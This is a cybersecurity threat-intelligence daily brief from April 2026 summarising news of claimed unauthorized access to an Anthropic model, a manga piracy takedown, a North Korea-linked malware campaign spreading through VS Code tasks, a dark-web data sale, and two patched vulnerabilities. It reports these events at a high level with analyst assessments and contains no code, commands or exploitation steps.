ZeroFox Daily Intelligence Brief - April 23, 2026

ZeroFox Daily Intelligence Brief - April 23, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Group Claims Unauthorized Access to Anthropic’s Claude Mythos
• Spanish Authorities Dismantle Major Manga Piracy Platform
• “Contagious Interview” Evolves into Self-Propagating Supply Chain Threat

Group Claims Unauthorized Access to Anthropic’s Claude Mythos

Source: https://www.bbc.com/news/articles/cy41zejp9pko

What we know: Anthropic is reportedly investigating claims of unauthorized access to its Claude Mythos model via a third-party vendor. On a private Discord channel, a group claimed it accessed the restricted cybersecurity AI tool, reportedly presenting screenshots and live demonstration of the platform as evidence.

Context: The group says it’s exploring new AI models and does not plan on misusing the Mythos tool. Anthropic reports no malicious activity. Claude Mythos has been released to select organizations for testing, as the company says the tool can be abused to supercharge cyberattacks by detecting unknown vulnerabilities.

Analyst note: The unauthorized access raises concerns about Anthropic’s safeguards against misuse, but the incident likely stems from activist researchers or whistleblowers and not threat actor activity. Insider threats, including through contracting entities, are very likely to emerge as a key risk for upcoming high-capability AI tools.

Spanish Authorities Dismantle Major Manga Piracy Platform

Source: https://www.bleepingcomputer.com/news/security/spain-dismantles-major-47m-manga-piracy-platform-arrests-four/

What we know: Spanish authorities have dismantled a major manga piracy operation called Tu Manga Online, arresting multiple suspects and seizing infrastructure and cryptocurrency assets.

Context: The site had operated since 2014, offering free access to copyrighted manga and attracting millions of global users. It generated over USD 4.7 million through aggressive, often explicit, advertising.

Analyst note: It is likely that new mirror or successor platforms will emerge, with any remaining members shifting monetization and promotion to less visible channels such as encrypted messaging apps like Telegram and other deep web forums. They may also adopt more controlled distribution models, such as private communities or invite-only platforms, to reduce enforcement exposure while sustaining their user base.

“Contagious Interview” Evolves into Self-Propagating Supply Chain Threat

Source: https://www.darkreading.com/cyberattacks-data-breaches/dprk-fake-job-scams-self-propagate-contagious-interview

What we know: North Korea-linked Contagious Interview campaign has evolved into a worm-like supply chain attack where compromised developer repositories propagate malware via malicious Visual Studio Code task configurations. Infected projects on platforms like GitHub spread remote access trojans and payloads downstream, turning each new victim into a distributor across the software ecosystem.

Context: The campaign has evolved beyond single-target social engineering attacks to broadly compromise organizations through the developer ecosystem. The activity is attributed to North Korea-linked “Void Dokkaebi,” which targets developers and steals high-value credentials. Void Dokkaebi infected over 750 code repositories, deploying more than 500 malicious Visual Studio Code task configurations.

Analyst note: In the near term, the campaign is likely to scale rapidly and diversify execution vectors beyond Visual Studio Code, leveraging stolen credentials and trusted code-signing mechanisms to make propagation stealthier, more persistent, and harder to detect.

DEEP AND DARK WEB INTELLIGENCE

DarkForums user SumudCyberCommand: Untested threat actor "SumudCyberCommand" has advertised a 15 TB dataset allegedly associated with the Institute for National Security Studies in Israel on deep web forum DarkForums. The dataset is priced at USD 800 and includes a sample. The dataset allegedly includes detailed maps regarding Iran’s aviation smuggling, WhatsApp chat exports of senior Israeli politicians, internal emails, classified policy papers on Gaza, and more. The claims are likely to be part of psychological operations against Israel to undermine public confidence and trigger panic in the community. The data likely consists of low-sensitivity or publicly available information, not classified material.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2026-40372: Microsoft has released an out-of-band (OOB) security patch for a critical privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw enables attackers to gain SYSTEM privileges by forging authentication cookies. Successful exploitation is likely to enable threat actors further lateral movement into a network, but will first require initial access through compromised credentials. Furthermore, threat actors are likely to be able to steal files and modify data, leading to data breaches or corruption of information.

Affected products: ASP.NET Core version 10.0

CVE-2026-28950: Apple has released an OOB security patch for iPhones and iPads to prevent notifications marked for deletion to be stored on the device. The vulnerability was described as a logging issue and was patched via improved data redaction. The patch almost certainly aims to fix a privacy issue to retain customer confidence in the security of Apple devices.

Affected products: The affected products are listed in this advisory.